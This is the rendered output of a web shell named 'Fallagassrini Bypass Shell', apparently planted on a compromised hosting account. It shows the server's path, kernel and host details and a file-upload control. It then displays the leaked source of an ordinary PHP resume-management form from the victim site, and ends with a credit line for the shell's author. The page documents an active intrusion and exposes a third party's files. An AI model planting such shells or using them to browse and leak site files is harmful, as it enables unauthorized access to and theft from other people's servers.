? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/sibs_draft/system/application/views/HR/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/sibs_draft/system/application/views/HR/addresumemanagement.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?>
<script type="text/javascript">

jQuery(document).ready(function () {

	$('.one').datepick({dateFormat: 'dd-mm-yyyy'});

       
});
</script>
<script type="text/javascript">


function checkfile(table)
{
    var file=document.getElementById('filename').value;
   
     
     
     $("#errordiv").load("<?= site_url('hr/filecheck/') ?>/"+table+ "/"+file,function(data)
     {
      if(data>=1)
          {
              alert("file already exist.Please Rename the file");
              document.getElementById('filename').value="";
          }
     });
}





function showDiv()
    {

        var divstyle = new String();
        divstyle = document.getElementById("div1").style.display;
        if(divstyle.toLowerCase()=="none" || divstyle == "")
        {
            document.getElementById("div1").style.display="block";
        }
        else
        {
            document.getElementById("div1").style.display="none";
        }

    }

    function showDivfolder()
    {

        var divstyle = new String();
        divstyle = document.getElementById("div2").style.display;
        if(divstyle.toLowerCase()=="none" || divstyle == "")
        {
            document.getElementById("div2").style.display="block";
        }
        else
        {
            document.getElementById("div2").style.display="none";
        }

    }
    function showfolderstruct()
    {

        var divstyle = new String();
        divstyle = document.getElementById("div3").style.display;
        if(divstyle.toLowerCase()=="none" || divstyle == "")
        {
            document.getElementById("div3").style.display="block";
        }
        else
        {
            document.getElementById("div3").style.display="none";
        }

    }
   function uploadsubpath(dirpath,subpath)
    {

        var uppath=dirpath +"/"+subpath;

         $("input#subpathname").val(uppath);


    }

    function uploadpath(dirpath)
    {
       $("input#subpathname").val(dirpath);
    }

</script>
<style type="text/css">

  .hidden_s {display: none;  }
  .hidden { display: none;   }

</style>

<div style="display:none" id="errordiv"></div>

<div class="select-bar">
<label>
    <img src="<?=base_url()?>/assets/images/backbutton.png" title="Back"  onclick="loadresumemanagement('<?=$_SESSION['pagenum']?>','<?=$_SESSION['searchoption']?>','<?=$_SESSION['searchtxt']?>')" alt="Back" align = "center" width="25" height="25"/></label>

		  </div>
<fieldset>
   <legend>Resume Management</legend> <?php
   $attributes = array('id' => 'customForm');
   echo form_open_multipart('hr/addresumemanagement',$attributes);?>

    

                <fieldset class ="leftalign">
                    <legend>Personal Details</legend>


    
    <ul>

        <li>
            <?php
         $data = array(
              'name'        => 'name',
              'id'          => 'name',
              );

        ?>
        <label for="date">Name</label>
              <?php echo form_input($data).form_error($data); ?><span id="nameInfo" class="red_bold">*</span>
        </li>
       

        <li>
            <label>Submission Date</label>
            <input class="one" name="subdate" id="subdate" readonly="true" type="text"   style="background-image: url(../../../../assets/images/datefocus.gif);">
        </li>
        <li>
        <label for="date">Email</label>
             <?php echo form_input('email'); ?>
        </li>
        <li>
        <label for="date">Contact No</label>
             <?php echo form_input('contactno'); ?>
        </li>
       <li></li>
    </ul>
                </fieldset>



    <fieldset class="rightalign">
                    <legend>Employee Details</legend>

    <ul>

    
        <li>
        <label for="date">Department</label>
             <?php echo form_input('department'); ?>
        </li>
        <li>
        <label for="date">Qualification</label>
             <?php echo form_input('qualification'); ?>
        </li>
        <li>
        <label for="date">Experience</label>
             <?php echo form_input('experience'); ?>
        </li>
        <li>
        <label for="date">Expected Salary</label>
             <?php echo form_input('expectedsalary'); ?>
        </li>

        <li></li>

    </ul>
     </fieldset>


  
        <li>


<fieldset>
      <br /><br />
<label for="country">Upload Resume</label>
<input type="file" id="filename" name="userfile" size="20" class="multi" onchange="checkfile('resumemanagement')" />
        <br /><br />

       </fieldset>

        </li>

                    <ul>
    <li><label for="submit">&nbsp;</label>
           <button type="submit" class="clickimage" id="submit" onclick="return doallthetwo();">Save</button>
    </li></ul>

             <?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net